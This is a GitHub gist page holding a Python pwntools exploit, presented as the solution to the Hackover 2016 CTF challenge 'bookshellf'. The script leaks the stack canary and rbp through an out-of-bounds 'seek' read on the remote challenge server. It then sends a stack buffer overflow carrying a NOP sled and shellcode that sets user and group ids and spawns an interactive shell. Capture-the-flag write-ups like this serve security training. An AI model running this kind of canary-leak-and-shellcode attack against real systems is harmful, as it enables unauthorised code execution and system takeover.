Created
October 9, 2016 12:25
-
-
Save c3c/1407e165d925026e018662b7d7d4d5c6 to your computer and use it in GitHub Desktop.
Hackover CTF bookshellf solution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| context.os = 'linux' | |
| context.arch = "amd64" | |
| #r = process("./bookshellf") | |
| r = remote("challenges.hackover.h4q.it", 31337) | |
| # using the book 'seek' function we can read past the array boundary and leak memory | |
| # we can leak the stack canary and rbp, then produce an overflow and overwrite rip while pointing to our shellcode (NX is not set) | |
| ## Get stack canary | |
| r.sendline("1") | |
| r.recvuntil(">") | |
| r.clean() | |
| r.sendline("memory.txt") | |
| r.recvuntil("continue?") | |
| r.sendline("s30729") # last byte of stack canary is a null byte (probably ubuntu: http://phrack.org/issues/67/13.html) | |
| r.recvuntil("more love!\n\n\n") | |
| canary = u64("\x00"+r.recvn(7)) | |
| log.info("Got the stack canary: 0x%x" % canary) | |
| r.sendline("n") | |
| r.recvuntil(">") | |
| r.clean() | |
| ## Get rbp | |
| r.sendline("1") | |
| r.recvuntil(">") | |
| r.clean() | |
| r.sendline("memory.txt") | |
| r.recvuntil("continue?") | |
| r.sendline("s30736") | |
| r.recvuntil("more love!\n\n\n") | |
| getrbp = r.recvn(6) | |
| assert getrbp[5] == "\x7f" | |
| rbp = u64(getrbp + "\x00\x00") | |
| log.info("rbp is at 0x%x" % rbp) | |
| r.sendline("n") | |
| r.recvuntil(">") | |
| r.clean() | |
| ## Smash it! | |
| r.sendline("1") | |
| r.recvuntil(">") | |
| r.clean() | |
| r.sendline("A"*31304 + p64(canary) + p64(rbp) + p64(rbp+32) + "\x90"*100 + asm(shellcraft.setresuid(1001,1001,1001) + shellcraft.setresgid(1001,1001,1001) + shellcraft.sh())) | |
| r.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment